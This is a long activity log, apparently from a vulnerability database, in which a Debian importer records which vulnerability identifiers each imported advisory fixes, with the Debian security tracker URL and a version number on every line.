2026-04-13T06:58:40.410918+00:00 Debian Importer Fixing VCID-nxfx-jh82-vud3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:57:54.256523+00:00 Debian Importer Fixing VCID-nvea-drm5-h3au https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:57:50.022953+00:00 Debian Importer Fixing VCID-dmut-jm9s-8ucc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:57:47.735568+00:00 Debian Importer Fixing VCID-kefv-kpkk-wudf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:56:12.091830+00:00 Debian Importer Fixing VCID-ky7v-89bx-3qc8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:56:08.630344+00:00 Debian Importer Fixing VCID-gdy9-dhzs-aqh9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:55:49.473167+00:00 Debian Importer Fixing VCID-xk7c-7f1m-sqe5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:55:08.141400+00:00 Debian Importer Fixing VCID-psf6-cvdn-h3b1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:55:02.278189+00:00 Debian Importer Fixing VCID-nvp5-dpj6-byda https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:40.445232+00:00 Debian Importer Fixing VCID-6jnv-nnkm-v7a3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:19.417020+00:00 Debian Importer Fixing VCID-5y2n-8d43-vfft https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:18.253297+00:00 Debian Importer Fixing VCID-tdsq-gc81-hqda https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:14.998617+00:00 Debian Importer Fixing VCID-v6h3-xnz8-xud4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:13.456641+00:00 Debian Importer Fixing VCID-x9y3-z82n-33d8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:09.068624+00:00 Debian Importer Fixing VCID-79w4-fqmh-j3bk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:54:03.085811+00:00 Debian Importer Fixing VCID-hc1j-dabv-pyge https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:58.909332+00:00 Debian Importer Fixing VCID-453d-2nac-jbdc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:42.026976+00:00 Debian Importer Fixing VCID-sdc2-fcap-abaz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:39.411700+00:00 Debian Importer Fixing VCID-q5su-zt4m-sqgx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:30.925180+00:00 Debian Importer Fixing VCID-e3av-cqc9-dye1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:27.528135+00:00 Debian Importer Fixing VCID-gx9p-3qdr-ebgw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:53:11.328632+00:00 Debian Importer Fixing VCID-dtza-65ku-aber https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:52:52.747020+00:00 Debian Importer Fixing VCID-thbh-m54e-z7ca https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:52:23.857132+00:00 Debian Importer Fixing VCID-18rv-b2mg-jbex https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:52:19.398836+00:00 Debian Importer Fixing VCID-yj6z-ege2-37gt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:52:18.049057+00:00 Debian Importer Fixing VCID-rhpj-r7ym-7kdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:59.624855+00:00 Debian Importer Fixing VCID-zfy5-md9a-h3gy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:48.226423+00:00 Debian Importer Fixing VCID-qsna-fp92-syce https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:37.101744+00:00 Debian Importer Fixing VCID-g6sp-5zkq-dkf9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:19.653735+00:00 Debian Importer Fixing VCID-r1uc-e1w7-kyda https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:12.252897+00:00 Debian Importer Fixing VCID-5qyh-zkxd-73c5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:51:12.176609+00:00 Debian Importer Fixing VCID-huhv-jxyu-jygx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:50:38.200986+00:00 Debian Importer Fixing VCID-9n1x-qw25-mbhf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:50:36.737508+00:00 Debian Importer Fixing VCID-ezcj-2yaf-rfhh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:50:23.531040+00:00 Debian Importer Fixing VCID-8drx-cw3m-dufq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:50:16.737390+00:00 Debian Importer Fixing VCID-x3wb-64kk-gues https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:49:46.219998+00:00 Debian Importer Fixing VCID-2ken-ysm1-2ybw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:49:45.330674+00:00 Debian Importer Fixing VCID-h7em-v8x6-63e3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:49:40.287338+00:00 Debian Importer Fixing VCID-j559-5amz-4qff https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:49:29.408168+00:00 Debian Importer Fixing VCID-wz1j-6ne4-m3a5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:49:18.106306+00:00 Debian Importer Fixing VCID-ucfp-qqy4-jqdm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:48:55.216818+00:00 Debian Importer Fixing VCID-rvjq-uks4-x3h3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:48:39.322042+00:00 Debian Importer Fixing VCID-uvpj-a8v5-ebgz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:47:52.486633+00:00 Debian Importer Fixing VCID-eg3d-khb6-rfh1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:47:37.055451+00:00 Debian Importer Fixing VCID-acgu-hc83-yubn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:47:35.372963+00:00 Debian Importer Fixing VCID-yx7r-r7ez-7uhp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:47:24.797549+00:00 Debian Importer Fixing VCID-dcde-mybb-bygv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:46:50.476745+00:00 Debian Importer Fixing VCID-fd5j-v9vt-5fbu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:46:37.513209+00:00 Debian Importer Fixing VCID-5xqd-gf3b-4ygw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:45:53.069654+00:00 Debian Importer Fixing VCID-hcjv-e7jt-nbbp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:45:38.310892+00:00 Debian Importer Fixing VCID-6e1q-75mk-pygm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:45:30.631351+00:00 Debian Importer Fixing VCID-q3v4-jztv-9bbs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:45:14.338914+00:00 Debian Importer Fixing VCID-nz2d-nk9v-f7cn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:44:55.537237+00:00 Debian Importer Fixing VCID-rm64-smat-8kfw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:44:40.883119+00:00 Debian Importer Fixing VCID-jkdz-rbkr-pygc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:44:26.013645+00:00 Debian Importer Fixing VCID-szhs-nysy-6bap https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:44:17.177823+00:00 Debian Importer Fixing VCID-xtq9-fvcv-kfat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:44:12.043828+00:00 Debian Importer Fixing VCID-ephb-spyf-c7d2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:43:58.574274+00:00 Debian Importer Fixing VCID-6d5n-tv5h-xkhj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:42:34.055514+00:00 Debian Importer Fixing VCID-smtf-q6g7-fqen https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:42:28.854919+00:00 Debian Importer Fixing VCID-gqgz-418x-skd3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:42:26.488095+00:00 Debian Importer Fixing VCID-hry9-mkha-nfct https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:42:19.598716+00:00 Debian Importer Fixing VCID-uhe3-t6mw-ckd2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:41:32.906851+00:00 Debian Importer Fixing VCID-rqm7-d751-myfa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:40:57.812284+00:00 Debian Importer Fixing VCID-xp7w-rc4w-jqcj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:40:32.219245+00:00 Debian Importer Fixing VCID-ury3-3x4b-1qh2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:40:30.979827+00:00 Debian Importer Fixing VCID-c11x-uq25-17b1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:40:08.247302+00:00 Debian Importer Fixing VCID-2dwv-ndt5-gfg2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:40:04.585334+00:00 Debian Importer Fixing VCID-my4x-d8ru-pybj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:39:45.561835+00:00 Debian Importer Fixing VCID-93em-sxxc-j3ep https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:38:15.692022+00:00 Debian Importer Fixing VCID-1nrq-kzuy-vyfx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:38:12.369420+00:00 Debian Importer Fixing VCID-8jgu-2tx3-gkcb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:37:18.716929+00:00 Debian Importer Fixing VCID-9ewm-6688-kkar https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:37:10.716912+00:00 Debian Importer Fixing VCID-5u53-66es-vkbv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:36:50.245785+00:00 Debian Importer Fixing VCID-p5f8-45e4-ybex https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:36:28.659691+00:00 Debian Importer Fixing VCID-jbt4-qpnp-yqdm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:36:20.668985+00:00 Debian Importer Fixing VCID-6y99-sgwe-tygw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:35:57.737948+00:00 Debian Importer Fixing VCID-gqky-zdxn-e3gd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:35:46.672965+00:00 Debian Importer Fixing VCID-vbdt-31wd-v3h8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:34:55.816983+00:00 Debian Importer Fixing VCID-6bf2-uh5z-kfg7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:34:34.711174+00:00 Debian Importer Fixing VCID-kert-7sg4-mke5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:34:21.406381+00:00 Debian Importer Fixing VCID-cjf4-c7t6-hqat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:34:18.548297+00:00 Debian Importer Fixing VCID-w5fb-28z5-rkfq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:34:05.704886+00:00 Debian Importer Fixing VCID-yz4e-znfx-zqhe https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:55.166657+00:00 Debian Importer Fixing VCID-1q1g-ses8-wqae https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:42.199100+00:00 Debian Importer Fixing VCID-4dxa-f7vm-7feh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:40.447699+00:00 Debian Importer Fixing VCID-rzz2-km3v-b3hw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:37.058032+00:00 Debian Importer Fixing VCID-zz1j-vw4k-ukdc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:30.876542+00:00 Debian Importer Fixing VCID-bz5u-dqy6-4ucd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:25.539367+00:00 Debian Importer Fixing VCID-n59p-w7sh-sbhb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:22.910472+00:00 Debian Importer Fixing VCID-qkw5-9mqc-a7a3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:14.227083+00:00 Debian Importer Fixing VCID-tm56-q7ka-ukft https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:12.955087+00:00 Debian Importer Fixing VCID-29r3-kvf4-n3hc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:03.266959+00:00 Debian Importer Fixing VCID-1kxn-kce4-sufx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:33:00.934358+00:00 Debian Importer Fixing VCID-1ftp-6fvm-rfez https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:32:37.768523+00:00 Debian Importer Fixing VCID-66d8-ts3a-ybev https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:32:27.794516+00:00 Debian Importer Fixing VCID-dvvt-ud6y-ffe8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:32:24.170881+00:00 Debian Importer Fixing VCID-b32k-mwuv-hfeq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:31:59.181692+00:00 Debian Importer Fixing VCID-u1fg-v9f6-z7ev https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:31:46.846445+00:00 Debian Importer Fixing VCID-b7u1-bftt-5kck https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:30:55.969396+00:00 Debian Importer Fixing VCID-wykb-4z7x-q7ga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:30:50.635635+00:00 Debian Importer Fixing VCID-9z34-j85g-9kej https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:30:44.476943+00:00 Debian Importer Fixing VCID-y2pd-cxmz-6yfp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:30:18.529997+00:00 Debian Importer Fixing VCID-jn3z-marg-3qgz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:29:57.865486+00:00 Debian Importer Fixing VCID-3dsm-e7ye-wqe1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:29:50.123038+00:00 Debian Importer Fixing VCID-zyg9-ad7g-ayex https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-12T17:48:11.923891+00:00 Debian Importer Fixing VCID-15mv-khzp-fqfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:27:19.518356+00:00 Debian Importer Fixing VCID-hrrw-ufje-akg5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:27:11.752053+00:00 Debian Importer Fixing VCID-pyd8-6ykz-yka7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:27:10.459768+00:00 Debian Importer Fixing VCID-qu7h-g9ku-pkct https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:27:03.889367+00:00 Debian Importer Fixing VCID-b3ps-gf9j-vubp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:27:02.056836+00:00 Debian Importer Fixing VCID-bpqt-4zxx-fkd4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:44.816245+00:00 Debian Importer Fixing VCID-n5r9-xgvu-skcg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:38.520607+00:00 Debian Importer Fixing VCID-mt9h-kjh8-kbdu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:37.680984+00:00 Debian Importer Fixing VCID-4633-67u6-akg8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:34.755016+00:00 Debian Importer Fixing VCID-x8c1-btup-4ygu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:33.291395+00:00 Debian Importer Fixing VCID-6wy3-xwez-vfej https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:23.951163+00:00 Debian Importer Fixing VCID-agz5-g8mr-e7hn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:10.593886+00:00 Debian Importer Fixing VCID-chgt-azpf-auba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:10.321172+00:00 Debian Importer Fixing VCID-2ea6-uaw4-wba9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:26:05.005357+00:00 Debian Importer Fixing VCID-qye1-pv1p-8fbp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:58.402483+00:00 Debian Importer Fixing VCID-rzs6-gp7c-vqhc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:56.965688+00:00 Debian Importer Fixing VCID-4s25-p8ea-zkh7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:52.170141+00:00 Debian Importer Fixing VCID-uatu-64df-b7b8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:44.548888+00:00 Debian Importer Fixing VCID-5efq-7fxc-zyet https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:39.448509+00:00 Debian Importer Fixing VCID-b8hx-6u4j-b3dc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:37.989166+00:00 Debian Importer Fixing VCID-rzzk-7g6m-3yfp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:36.756362+00:00 Debian Importer Fixing VCID-c3ut-nv6u-efbj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:31.885797+00:00 Debian Importer Fixing VCID-aars-axy1-4yd6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:24.155426+00:00 Debian Importer Fixing VCID-spch-fffg-4yc5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:21.540818+00:00 Debian Importer Fixing VCID-bf7n-dsx6-rqa2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:25:16.689525+00:00 Debian Importer Fixing VCID-1a39-qxtg-fkhx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:24:38.860162+00:00 Debian Importer Fixing VCID-9wbc-9sby-nfbq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:24:33.494123+00:00 Debian Importer Fixing VCID-w8gb-1r6a-xud3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:24:31.799929+00:00 Debian Importer Fixing VCID-2pwb-71f5-8ken https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:24:31.616060+00:00 Debian Importer Fixing VCID-zyh3-cmka-wqb8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:24:10.037222+00:00 Debian Importer Fixing VCID-3fa4-xqhq-2fdq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:53.300491+00:00 Debian Importer Fixing VCID-zz57-zmka-33ev https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:49.711594+00:00 Debian Importer Fixing VCID-rbgb-rbtn-eqff https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:21.925051+00:00 Debian Importer Fixing VCID-cz1h-x2a4-zkhj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:14.642279+00:00 Debian Importer Fixing VCID-aycq-4vqg-ubgp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:13.769098+00:00 Debian Importer Fixing VCID-6gh6-3g99-x7hz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:13.347935+00:00 Debian Importer Fixing VCID-1abc-45xr-5bhb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:23:10.016017+00:00 Debian Importer Fixing VCID-wwcs-2mw8-4bbr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:22:57.502032+00:00 Debian Importer Fixing VCID-m31q-v2ue-zyh1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:22:55.335702+00:00 Debian Importer Fixing VCID-6t7d-2hre-sqbw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:22:53.425394+00:00 Debian Importer Fixing VCID-pydk-g827-guc5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:22:30.971035+00:00 Debian Importer Fixing VCID-azvc-qdxb-7bbu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:59.335449+00:00 Debian Importer Fixing VCID-fzct-psgq-8fcb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:58.246659+00:00 Debian Importer Fixing VCID-j1jt-g5m8-ffbh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:55.704835+00:00 Debian Importer Fixing VCID-74ak-g3rw-xygd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:40.256124+00:00 Debian Importer Fixing VCID-sd54-b8z1-2fg7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:25.767368+00:00 Debian Importer Fixing VCID-qrqm-h5se-1kep https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:12.222409+00:00 Debian Importer Fixing VCID-neaa-39c7-sfbc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:21:06.576994+00:00 Debian Importer Fixing VCID-r5v1-hra4-c3ce https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:53.366261+00:00 Debian Importer Fixing VCID-1gh4-vs86-aufs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:51.243490+00:00 Debian Importer Fixing VCID-bd1g-sfsp-37h7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:43.619732+00:00 Debian Importer Fixing VCID-cwez-6cgj-17gz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:39.470831+00:00 Debian Importer Fixing VCID-m9fk-3upg-33eu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:29.989582+00:00 Debian Importer Fixing VCID-s4p8-s262-fqfx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:28.244183+00:00 Debian Importer Fixing VCID-41xr-8ryd-z3ew https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:18.132693+00:00 Debian Importer Fixing VCID-mvga-q2ts-mqdh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:20:13.258953+00:00 Debian Importer Fixing VCID-ccbh-689z-6kg2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:59.985778+00:00 Debian Importer Fixing VCID-raec-f3zw-bfdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:53.809060+00:00 Debian Importer Fixing VCID-2fzg-6h13-s7bk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:51.688658+00:00 Debian Importer Fixing VCID-rrvd-vd81-sfdm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:51.593360+00:00 Debian Importer Fixing VCID-evu2-cxt1-4qhq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:40.868465+00:00 Debian Importer Fixing VCID-cure-qgzj-8qfu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:39.447410+00:00 Debian Importer Fixing VCID-gmm9-wk5j-gfh4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:35.345049+00:00 Debian Importer Fixing VCID-g1e8-3nnr-gqff https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:32.361127+00:00 Debian Importer Fixing VCID-k1v6-jp8s-pye7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:27.945110+00:00 Debian Importer Fixing VCID-3uv5-g9f4-kyg2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:24.174003+00:00 Debian Importer Fixing VCID-mws6-wym5-d3f6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:19:20.035534+00:00 Debian Importer Fixing VCID-vbqu-m52z-4qfg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:58.654936+00:00 Debian Importer Fixing VCID-qc16-r3cs-cbdr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:47.634440+00:00 Debian Importer Fixing VCID-p6m5-ntbm-auct https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:41.357833+00:00 Debian Importer Fixing VCID-u6vb-tewy-fkda https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:38.703638+00:00 Debian Importer Fixing VCID-s543-mazj-fqfd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:14.681407+00:00 Debian Importer Fixing VCID-pwhs-ep5j-pqa7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:18:07.838402+00:00 Debian Importer Fixing VCID-mn5y-2hmf-dkgy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:57.786581+00:00 Debian Importer Fixing VCID-15ny-qqbj-qyfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:50.826168+00:00 Debian Importer Fixing VCID-8b34-juwg-pkcb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:38.327786+00:00 Debian Importer Fixing VCID-gc9p-4vdm-rbah https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:23.027454+00:00 Debian Importer Fixing VCID-w289-j445-xka7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:22.874437+00:00 Debian Importer Fixing VCID-75nc-a6rr-g3f6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:15.753555+00:00 Debian Importer Fixing VCID-ray4-6nnk-93f7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:15.589823+00:00 Debian Importer Fixing VCID-gdg8-aejn-83c4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:17:13.344162+00:00 Debian Importer Fixing VCID-nzh5-tng5-8qdq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:56.991723+00:00 Debian Importer Fixing VCID-fek5-ee6j-yqhv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:47.791344+00:00 Debian Importer Fixing VCID-gs3p-hzxs-kfcq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:42.801453+00:00 Debian Importer Fixing VCID-u7dc-kx3v-4ffz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:32.950963+00:00 Debian Importer Fixing VCID-ksuz-r36k-wygy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:16.539772+00:00 Debian Importer Fixing VCID-2wxd-hmac-4fcv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:55.873160+00:00 Debian Importer Fixing VCID-gf8v-mmd7-hqag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:49.361311+00:00 Debian Importer Fixing VCID-y3xr-bv9y-mqb5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:46.499663+00:00 Debian Importer Fixing VCID-mrqv-9kq9-e3h5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:40.371693+00:00 Debian Importer Fixing VCID-fzhr-jhhc-m3ej https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:32.912592+00:00 Debian Importer Fixing VCID-2a2h-yk41-qybt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:27.415303+00:00 Debian Importer Fixing VCID-gq8m-6nq9-4bcq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:27.044218+00:00 Debian Importer Fixing VCID-vp4y-qhc4-nuat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:22.015243+00:00 Debian Importer Fixing VCID-vrqg-4fke-mfay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:15:21.967074+00:00 Debian Importer Fixing VCID-y8aj-9qsj-7ucs https://security-tracker.debian.org/tracker/data/json 38.3.0
